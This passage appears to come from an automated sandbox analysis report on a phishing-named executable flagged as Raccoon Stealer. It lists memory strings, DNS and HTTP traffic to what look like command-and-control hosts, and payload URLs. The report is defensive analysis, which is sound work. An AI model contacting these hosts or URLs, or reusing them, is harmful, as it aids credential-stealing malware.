Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","applicati
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: rence":"http://support.apple.com/kb/HT203092","status":"requires_authorization","version":"7.7.6"}]},"chromium-pdf":{"group_name_matcher":"*Chromium PDF Viewer*","mime_types":[],"name":"Chromium PDF Viewer","versions":[{"comment":"Chromium PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"chromium-pdf-plugin":{"group_name_matcher":"*Chromium PDF Plugin*","mime_types":[],"name":"Chromium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","applicati
Source: unknown DNS traffic detected: queries for: ekocafebali.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 45.139.236.6
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe String found in binary or memory: http://45.139.236.6/
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921er
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6/E
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: http://45.139.236.6/OINT
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp String found in binary or memory: http://45.139.236.6/q_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6ne
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dst
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.4.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.4.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp String found in binary or memory: http://cps.letseh
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: nssckbi.dll.4.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://ocsp.accv.es0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.4.dr String found in binary or memory: http://policy.camerfirma.com0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://r3.i.lencr.org/0-
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0Y
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: nssckbi.dll.4.dr String found in binary or memory: http://repository.swisssign.com/0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.4.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: RYwTiizs2t.4.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: RYwTiizs2t.4.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839128579.0000000000A18000.00000004.00000001.sdmp String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846081146.00000000009EC000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846017240.0000000000A22000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1xdLMEM
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846017240.0000000000A22000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1e-LMEM
Source: RYwTiizs2t.4.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.4.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.4.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp String found in binary or memory: https://ekocafebali.com/wp-content/plugins/vmaxyvefms/back/78893c675eddafbfbda146801a998645182ce2c3_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp String found in binary or memory: https://ekocafebali.com/wp-content/plugins/vmaxyvefms/main/78893c675eddafbfbda146801a998645182ce2c3_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://helpx.a
Source: nssckbi.dll.4.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.4.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.4.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.4.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://support.google.c
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837414207.0000000000A22000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837391480.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837414207.0000000000A22000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837391480.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://telete.in/yoyodcabane
Source: nssckbi.dll.4.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.4.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngx%
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: RYwTiizs2t.4.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown HTTPS traffic detected: 111.67.28.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.4:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

System Summary:

barindex
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process Stats: CPU usage > 98%
PE file contains more sections than normal
Source: sqlite3.dll.4.dr Static PE information: Number of sections : 18 > 10
Sample file is different than original file name gathered from version info
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798617531.0000000000740000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki TasuiBoshiyuki Tasui@ vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki TasuiK vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2X vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
